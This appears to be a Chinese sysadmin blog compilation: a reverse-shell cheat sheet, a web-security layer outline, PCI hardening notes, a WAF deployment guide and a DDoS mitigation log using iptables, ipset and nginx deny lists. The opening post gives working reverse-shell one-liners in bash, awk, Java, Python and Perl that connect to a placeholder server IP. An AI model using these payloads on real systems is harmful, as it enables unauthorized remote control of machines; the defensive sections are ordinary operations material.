反弹式shell 前言{callout color="#f0ad4e"}反弹shell是指控制端监听某个TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出传递到控制端的过程。反弹shell是打开内网通道的第一步，也是权限提升过程中至关重要的一步。{/callout}服务端#打开本地监听 nc -lvvp 2333客户端bash版bash -i >& /dev/tcp/服务端IP/2333 0>&1awk版awk 'BEGIN{s="/inet/tcp/0/服务端IP/2333";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'java版public class fShell { /** * @param args * @throws Exception */ public static void main(String[] args) throws Exception { // TODO Auto-generated method stub Runtime r = Runtime.getRuntime(); String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/服务端IP/2333;cat <&5 | while read line; do $line 2>&5 >&5; done"}; Process p = r.exec(cmd); p.waitFor(); } }编译执行javac fShell.java java fShellpython版python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('服务器IP',2333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"Perl版perl -e 'use Socket;$i="服务器IP";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

web安全数据流 数据流{alert type="info"}横向的是层、纵向的是数据流 从上到下 从下到上 每层怎样处理数据{/alert}{card-default label="数据流" width="90%"}{/card-default}{message type="success" content="一切的安全问题都体现在“输入输出”上，一切的安全问题都存在于“数据流”的整个过程中。"/}大纲 浏览器 | 第三方内容： 广告统计、mockup | Web前端框架： jQuery、Bootstrap、HTML5框架 （XSS跨站脚本安全） | Web应用: BBS 、 CMS 、 BLOG | Web开发框架： Django 、Rails 、ThinkPHP （一句话木马） | Web服务端语言： PHP 、JSP 、.NET | Web容器: Apache 、IIS 、Nginx （远程溢出、DoS） | 存储： 数据库存储、内存存储 、文件存储 （SQL注入） | 操作系统： Linux 、 Windows OS命令执行）

对接支付需要过PCI认证，lnmp架构配置记录 前言{callout color="#f0ad4e"}电商网站对接信用卡直连的过程中，需要提供PCI认证。对网站的安全性要求比较高。特此记录在PCI认证过程中，基于lnmp架构的网站的整改配置过程。{/callout}措施升级php到最新版升级nginx到最新版nginx禁用tlsv1.0升级JqueryFAQtlsv禁用后测试openssl s_client -connect IP:443 -tls1

web防火墙aihttps的部署与使用 {card-default label="aihttps商业版" width="90%"}{/card-default}前言{callout color="#f0ad4e"}aihttps是hihttps的升级版，首款基于机器学习、自主对抗未知攻击的高性能WEB应用防火（ SSL WAF），源码完整并且兼容ModSecurity正则规则。{/callout}项目地址: http://www.hihttps.com/部署安装依赖yum install -y openssl openssl-devel yum install -y pcre pcre-devel下载源码并编译cd /opt/ git clone https://github.com/qq4108863/hihttps.git cd hihttps/ && make配置编辑配置文件 config.cfg# 前端SSL绑定的端口，默认443，注意不要冲突了 frontend = { host = "*" port = "443" } backend = "[172.19.0.4]:8082" # 后端默认反向连接80端口 workers = 1 # CPU 数量 daemon = off # 关闭后台模式，方便调试 #证书文件,建议设置绝对路径，大部分不能运行的都是这几项设置错误。 pem-file = "www.itbunan.xyz.pem" # 为了安全，请设置运行的用户组和权限，默认nobody，请确认系统存在有nobody。 # user and group user = "nobody" group = "nobody" #日志级别 log-level = 2启动./aihttps --config config.cfg{card-default label="hihttps" width="80%"}{/card-default}FAQnginx的crt证书转pemopenssl x509 -in www.itbunan.xyz_bundle.crt -out /opt/hihttps/www.itbunan.xyz.pem -outform PEM openssl rsa -in www.itbunan.xyz.key -out /tmp/tmp.pem cat /tmp/tmp.pem >> /opt/hihttps/www.itbunan.xyz.pem

一次DDos防御过程全记录 前言{callout color="#f0ad4e"}一个小伙伴找到我，说新做的创业项目刚有点起色，每天断断续续有了收入。这几天，莫名其妙的就没法访问了，要不就卡得要死。也不知道什么原因？让我帮忙看看。废话不多说，直接开始干活。让他把访问日志，发给我。然后统计了一下，访问量。好家伙，一个小破站，单IP访问量好几万的就就两千多个，妥妥的DDos攻击哇。如图，{/callout}{card-default label="被攻击" width="75%"}{/card-default}{message type="success" content="统计每个IP地址访问网站的次数命令"/}# 日志统计命令 cat httpd_access.log | awk '{print $1}'| sort -k 1 | uniq -c | sort -rnk 1 | grep -v '::' > result.txt分析{callout color="#f0ad4e"}先了解情况，服务部署在阿里云服务器上，同时腾讯云上也有另一个站，遇到了同样的情况。打开了默认的安全配置，说还是有点效果的。给我发了张截图：免费版安全服务拦截次数看到截图，近两千万次的攻击，拦截了两千次，跟没有不一样么？然后因为流量过大，被封2小时。一天被搞个几次，都快哭啦。直接上高防吧，简单粗暴。抛开技术层面的东西，ddos的战争拼到最后，拼的就是钱！结果小伙伴说，太贵啦！高防基础版，一个月就大几千块，是在负担不起。服务器资源才一百多块钱。问问有没有其他的方法。我想起了自己当初搞网站，遇到过ddos。也是因为没钱，买不起高防。自己用iptables+ipset自动封IP，然后死挺。弄好之后，网站恢复正常访问。就不管他啦。那就试试吧。{/callout}实施{message type="success" content="centos7下，采用iptables+ipset 自动封IP方法。因为对firewall不熟悉，卸载，装iptables+ipset"/}更换iptablesservice firewalld stop systemctl disable firewalld.service yum remove firewalld yum install iptables-services iptables ipset ipset-service systemctl enable ipset systemctl enable iptablesiptables脚本iptables -P INPUT ACCEPT iptables -P OUTPUT ACCEPT iptables -F iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT iptables -A INPUT -i lo -j ACCEPT iptables -A INPUT -p tcp -m set --match-set blackiplist src -m tcp --dport 80 -j DROP iptables -A INPUT -p tcp -m set --match-set blackiplist src -m tcp --dport 443 -j DROP iptables -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT iptables -A INPUT -p tcp -m tcp --dport 443 -j ACCEPT iptables -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT iptables -A INPUT -p tcp -m tcp --dport 4848 -j ACCEPT iptables -A INPUT -p icmp -m icmp --icmp-type 8 -j DROP iptables -A INPUT -j DROP iptables -A OUTPUT -p udp -d 183.60.82.98 --dport 53 -j ACCEPT iptables -A OUTPUT -p udp -d 183.60.83.19 --dport 53 -j ACCEPT iptables -A OUTPUT -p udp -j DROP重启iptables服务service iptables save service iptables restart iptables -nvL添加ipset黑名单ipset create blackiplist hash:ip timeout 86400 hashsize 4096 maxelem 1000000设置计划任务*/3 * * * * /usr/bin/bash /root/cron-for-ddos.sh > /dev/null 2>&1{card-describe title="脚本内容"}#!/bin/bash time=`env LC_ALL=en_US.en date -d '1 minute ago' '+%e/%b/%G:%H:%M'` log='/var/log/nginx/acc.log' #日志路径 tail -n 30000 "log" | grep "$time" |awk '{print $1}'| sort -k 1 | uniq -c | sort -rnk 1 | grep -v '::' > /tmp/blackiplist.txt while IFS=' ' read a b do if [ "$a" -gt "60" ];then /usr/sbin/ipset add blackiplist $b else break fi done < /tmp/blackiplist.txt{/card-describe}{callout color="#f0ad4e"}部署好之后，下次攻击封掉了一部分IP，然后又没法访问啦！！没办法，等后台看了下。国内的云服务真是坑人呐，哪怕买了固定带宽，只要超过阈值，就封你两小时。完全没脾气。当初我的服务部署在国外，从没因为带宽问题被封过。没办法，只好换其他方法。然后有用CDN抗ddos攻击流量，把真实的服务器IP隐藏起来。配置好后，解决了因为流量过大导致的被云提供商封掉的问题。稳定运行了将近一天时间，抗住了几波攻击，本以为对方会知难而退，结果没过多久，小伙伴又找来啦。说网站又不行啦。心中一万只草泥马在奔腾，继续搞。远程登陆，分析日志，还是ddos，这次是针对业务端口发起的cc。直接服务器负载100%。然后导致正常用户访问出现404错误。因为现在真实节点，处于cdn的后面。所有的流量都是cdn节点回源请求，通过iptables+ipset的方法已经不起作用。这次就用nginx做应用层访问控制，将请求过于频繁的IP直接返回403错误。通过CDN将403缓存。{/callout}nginx配置过程修改nginx配置{message type="success" content="在nginx的配置文件目录的conf.d下创建blackip.conf"/}{card-describe title="文件内容"}deny 195.91.122.67; deny 195.91.122.19;{/card-describe}计划任务*/3 * * * * /usr/bin/sh /var/scripts/add_blackip_for_ddos_per_min.sh > /dev/null 2>&1{message type="success" content="add_blackip_for_ddos_per_min.sh 脚本内容"/}#!/bin/bash m_time=`env LC_ALL=en_US.en date -d '1 minute ago' '+%e/%b/%G:%H:%M'` log='/www/wwwlogs/nginx_acc.log' conf='nginx/blackip.conf' #配置文件路径 # 筛选攻击IP tail -n 100000 $log | grep "$m_time" |awk '{print $1}'| sort -k 1 | uniq -c | sort -rnk 1 | grep -v '::' > /tmp/blackip_per_min.txt cat /tmp/blackip_per_min.txt | awk '{if($1>60)print "deny "$2";"}' >> $confnginx加载配置/opt/nginx/sbin/nginx -s reload{callout color="#f0ad4e"}配置完成后，网站恢复了正常。我和小伙伴说，如果对面继续升级攻击方式的话，没办法，直接买高防吧。专业的事情，找专业的人搞，怕花钱也没法了。你这是得罪谁了，被人盯着打。结果，抗了一天，又挂啦。直接买了高防，用高防抗了一天。高防也超过了攻击阈值，又被封了。吐槽一下，某云的安全服务真是抢钱！用了他家的服务，没过多久，就会变成他家的全家桶。{/callout}